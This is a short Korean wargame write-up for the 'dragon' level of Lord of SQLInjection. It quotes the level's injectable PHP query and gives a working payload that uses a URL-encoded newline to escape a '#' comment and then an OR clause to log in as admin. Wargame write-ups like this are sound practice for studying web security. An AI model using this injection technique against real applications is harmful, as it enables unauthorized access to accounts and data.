[WriteUp]/[Lord Of SQLInjection] dragon
2025. 3. 7. 15:10ㆍHacking/WebHacking Wargame Writeup
$query = "select id from prob_dragon where id='guest' # and pw='{$_GET[pw]}'";
→ 여기서 #은 한 줄만 주석으로 친다.
⇒ 줄을 바꿔주고 query를 작성하면 주석처리가 적용되지 않는다.
[도메인 값]?pw=%0a and pw='' or id='admin
→ %0a로 줄바꿈 처리
→ pw를 =’’로 재정의
→ 그 후 or을 이용해 id=’admin으로 지정해준다.
'Hacking > WebHacking Wargame Writeup' 카테고리의 다른 글
| [WriteUp] / [Dreamhack] pathtraversal (0) | 2025.03.31 |
|---|---|
| [WriteUp] / [Dreamhack] session (0) | 2025.03.31 |
| [WriteUp]/[Lord of SQLInjection] xavis (0) | 2025.03.07 |
| [Writeup]/[Lord of SQLInjection] nightmare (0) | 2025.03.05 |
| [Writeup]/[Lord Of SQLInjection] zombie_assassin (0) | 2025.03.05 |